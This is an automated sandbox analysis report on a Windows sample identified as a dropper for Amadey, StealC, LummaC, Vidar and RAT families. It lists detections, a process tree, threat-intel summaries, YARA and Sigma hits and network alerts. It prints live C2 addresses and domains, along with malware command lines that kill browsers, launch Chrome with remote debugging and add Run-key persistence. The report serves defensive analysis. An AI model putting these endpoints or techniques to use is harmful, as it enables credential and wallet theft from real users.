Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1572005
MD5:	c5cc3918ae519563751641959f52ea48
SHA1:	a89fbdcbe3042189962c1c68853f34cd9c9a5c6b
SHA256:	3b83ba98959f8b8c013d6b6fe94b17c5de99b1a798da2f5b33a2c3be6e9b18b6
Tags:	exeuser-Bitsight
Infos:

Detection

Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Attempt to bypass Chrome Application-Bound Encryption

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Suricata IDS alerts for network traffic

Yara detected Amadeys stealer DLL

Yara detected AsyncRAT

Yara detected Credential Flusher

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected VenomRAT

Yara detected Vidar stealer

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

C2 URLs / IPs found in malware configuration

Check if machine is in data center or colocation facility

Contains functionality to capture screen (.Net source)

Contains functionality to log keystrokes (.Net Source)

Creates multiple autostart registry keys

Disable Windows Defender notifications (registry)

Disable Windows Defender real time protection (registry)

Disables Windows Defender Tamper protection

Drops PE files to the document folder of the user

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Machine Learning detection for dropped file

Machine Learning detection for sample

Modifies existing user documents (likely ransomware behavior)

Modifies windows update settings

PE file contains section with special chars

Potentially malicious time measurement code found

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sigma detected: New RUN Key Pointing to Suspicious Folder

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Sigma detected: Browser Started with Remote Debugging

Sigma detected: CurrentVersion Autorun Keys Modification

Stores large binary data to the registry

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses taskkill to terminate processes

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

file.exe (PID: 7288 cmdline: "C:\Users\user\Desktop\file.exe" MD5: C5CC3918AE519563751641959F52EA48)

chrome.exe (PID: 7488 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7764 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2732 --field-trial-handle=2192,i,1873079867265543632,18223947930530231182,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cmd.exe (PID: 2108 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\CAFIJKFHIJ.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

CAFIJKFHIJ.exe (PID: 7512 cmdline: "C:\Users\user\Documents\CAFIJKFHIJ.exe" MD5: 520EE940832D8A70CEF812A75401009C)

skotes.exe (PID: 7992 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 520EE940832D8A70CEF812A75401009C)

skotes.exe (PID: 7972 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 520EE940832D8A70CEF812A75401009C)

skotes.exe (PID: 7632 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 520EE940832D8A70CEF812A75401009C)

n4e23hz.exe (PID: 5724 cmdline: "C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe" MD5: 40F8C17C136D4DC83B130C9467CF6DCC)

b24ae367e7.exe (PID: 2300 cmdline: "C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe" MD5: 3ACAA0D2F010B5962A1EE0687334660D)

WerFault.exe (PID: 4824 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2300 -s 572 MD5: C31336C1EFC2CCB44B4326EA793040F2)

d985563cac.exe (PID: 5796 cmdline: "C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe" MD5: 52868AF74EE73E05662D437482D99489)

chrome.exe (PID: 5380 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=d985563cac.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6572 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2468 --field-trial-handle=2060,i,10439888162211895715,7665317762376180404,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

25045de666.exe (PID: 5592 cmdline: "C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe" MD5: C5CC3918AE519563751641959F52EA48)

f1628a2a52.exe (PID: 1608 cmdline: "C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe" MD5: 72C4511A4B6D2BF79B718256C8D65AC8)

taskkill.exe (PID: 7320 cmdline: taskkill /F /IM firefox.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 7328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 7388 cmdline: taskkill /F /IM chrome.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 7392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 5916 cmdline: taskkill /F /IM msedge.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 8164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 7508 cmdline: taskkill /F /IM opera.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 7772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 5956 cmdline: taskkill /F /IM brave.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 7524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

firefox.exe (PID: 8104 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

1124f3753f.exe (PID: 3672 cmdline: "C:\Users\user\AppData\Local\Temp\1013559001\1124f3753f.exe" MD5: AEC32FF205AECDA2D3D39769D699E065)

c20459f2e6.exe (PID: 6028 cmdline: "C:\Users\user\AppData\Local\Temp\1013560001\c20459f2e6.exe" MD5: 3ACAA0D2F010B5962A1EE0687334660D)

d985563cac.exe (PID: 4600 cmdline: "C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe" MD5: 52868AF74EE73E05662D437482D99489)

d985563cac.exe (PID: 8048 cmdline: "C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe" MD5: 52868AF74EE73E05662D437482D99489)

firefox.exe (PID: 7964 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 8016 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 3300 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2328 -parentBuildID 20230927232528 -prefsHandle 2276 -prefMapHandle 2272 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7a180dc8-8c9c-4623-9a95-8d8228371a46} 8016 "\\.\pipe\gecko-crash-server-pipe.8016" 2739786e510 socket MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

firefox.exe (PID: 2232 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3380 -parentBuildID 20230927232528 -prefsHandle 4032 -prefMapHandle 1484 -prefsLen 26208 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d819197d-ad4a-4ad0-9b0f-25dcec234d88} 8016 "\\.\pipe\gecko-crash-server-pipe.8016" 27397886d10 rdd MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

25045de666.exe (PID: 64 cmdline: "C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe" MD5: C5CC3918AE519563751641959F52EA48)

f1628a2a52.exe (PID: 7344 cmdline: "C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe" MD5: 72C4511A4B6D2BF79B718256C8D65AC8)

taskkill.exe (PID: 7524 cmdline: taskkill /F /IM firefox.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 4448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 6672 cmdline: taskkill /F /IM chrome.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 7392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 1120 cmdline: taskkill /F /IM msedge.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 3672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

taskkill.exe (PID: 6048 cmdline: MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

conhost.exe (PID: 5844 cmdline: MD5: 0D698AF330FD17BEE3BF90011D49251D)

25045de666.exe (PID: 8176 cmdline: "C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe" MD5: C5CC3918AE519563751641959F52EA48)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
AsyncRAT	AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/asyncrat-onenote-dropper https://aidenmitchell.ca/asyncrat-via-vbs/ https://assets.virustotal.com/reports/2021trends.pdf https://axmahr.github.io/posts/asyncrat-detection/ https://blog.checkpoint.com/research/november-2023s-most-wanted-malware-new-asyncrat-campaign-discovered-while-fakeupdates-re-entered-the-top-ten-after-brief-hiatus/	https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}

Threatname: LummaC

{"C2 url": ["impend-differ.biz", "formy-spill.biz", "covery-mover.biz", "print-vexer.biz", "dwell-exclaim.biz", "dare-curbys.biz", "atten-supporse.biz", "se-blurry.biz", "zinc-sneark.biz"], "Build id": "LOGS11--LiveTraffic"}

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000012.00000003.2778454401.000000000145F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000010.00000003.2714140999.0000000001331000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2124046353.000000000059E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000011.00000003.2697522717.0000000005530000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000000D.00000003.3096951530.0000000006E6D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000003.3096951530.0000000006E6D000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x21a929:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
00000025.00000002.2991880808.000000000071B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.2124461311.0000000000A81000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000025.00000002.2997900690.0000000000B61000.00000040.00000001.01000000.00000012.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000010.00000003.2665848570.0000000001333000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000010.00000003.2714429122.0000000001333000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000025.00000003.2903532225.0000000004CA0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.2124461311.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001E.00000003.2911591776.0000000001480000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.2193715295.0000000000501000.00000040.00000001.01000000.0000000D.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000010.00000003.2690163685.000000000132F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001E.00000003.2970106725.0000000001480000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001E.00000003.2991550390.0000000001491000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000003.2439904797.0000000005540000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000010.00000003.2663222028.000000000132F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000010.00000003.2688903323.000000000132F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000011.00000002.2744434040.000000000179E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000001E.00000003.2875167398.000000000148E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000010.00000003.2664605570.0000000001333000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001E.00000003.2875015160.0000000001481000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1688422254.0000000004B40000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000000A.00000002.2187919871.0000000000501000.00000040.00000001.01000000.0000000D.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000010.00000003.2738907476.0000000001331000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.2157462827.00000000002C1000.00000040.00000001.01000000.0000000B.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000011.00000002.2739858298.0000000000B61000.00000040.00000001.01000000.00000012.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0000001E.00000003.2940878588.0000000001483000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000010.00000003.2748805077.000000000134D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 7288	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 7288	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: file.exe PID: 7288	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 7288	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: n4e23hz.exe PID: 5724	JoeSecurity_VenomRAT	Yara detected VenomRAT	Joe Security
Process Memory Space: d985563cac.exe PID: 5796	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: d985563cac.exe PID: 5796	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Process Memory Space: d985563cac.exe PID: 5796	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 25045de666.exe PID: 5592	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: 25045de666.exe PID: 5592	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: d985563cac.exe PID: 4600	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: d985563cac.exe PID: 4600	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: f1628a2a52.exe PID: 1608	JoeSecurity_CredentialFlusher	Yara detected Credential Flusher	Joe Security
Process Memory Space: d985563cac.exe PID: 8048	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: d985563cac.exe PID: 8048	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Click to see the 42 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
13.3.n4e23hz.exe.6f623b8.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
13.3.n4e23hz.exe.6f623b8.0.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x123771:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
13.3.n4e23hz.exe.6f623b8.0.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x129a0b:$s1: \VPN\NordVPN 0x1299f1:$s2: \VPN\OpenVPN 0x1299d3:$s3: \VPN\ProtonVPN
13.3.n4e23hz.exe.6f623b8.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
13.3.n4e23hz.exe.6f623b8.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x125571:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
13.3.n4e23hz.exe.6f623b8.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x12b80b:$s1: \VPN\NordVPN 0x12b7f1:$s2: \VPN\OpenVPN 0x12b7d3:$s3: \VPN\ProtonVPN
9.2.CAFIJKFHIJ.exe.2c0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
11.2.skotes.exe.500000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
10.2.skotes.exe.500000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Click to see the 4 entries

Sigma Signatures

System Summary

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 7632, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\d985563cac.exe

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7288, ParentProcessName: file.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", ProcessId: 7488, ProcessName: chrome.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 7632, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\d985563cac.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T00:43:34.207201+0100	2028371	3	Unknown Traffic	192.168.2.4	49850	104.21.80.1	443	TCP
2024-12-10T00:43:36.572551+0100	2028371	3	Unknown Traffic	192.168.2.4	49859	104.21.80.1	443	TCP
2024-12-10T00:43:39.013141+0100	2028371	3	Unknown Traffic	192.168.2.4	49864	104.21.80.1	443	TCP
2024-12-10T00:43:41.624379+0100	2028371	3	Unknown Traffic	192.168.2.4	49869	104.21.80.1	443	TCP
2024-12-10T00:43:43.981246+0100	2028371	3	Unknown Traffic	192.168.2.4	49877	104.21.80.1	443	TCP
2024-12-10T00:43:45.975989+0100	2028371	3	Unknown Traffic	192.168.2.4	49884	104.21.80.1	443	TCP
2024-12-10T00:43:47.432495+0100	2028371	3	Unknown Traffic	192.168.2.4	49888	104.21.80.1	443	TCP
2024-12-10T00:43:48.095980+0100	2028371	3	Unknown Traffic	192.168.2.4	49889	104.21.80.1	443	TCP
2024-12-10T00:43:50.007332+0100	2028371	3	Unknown Traffic	192.168.2.4	49895	104.21.80.1	443	TCP
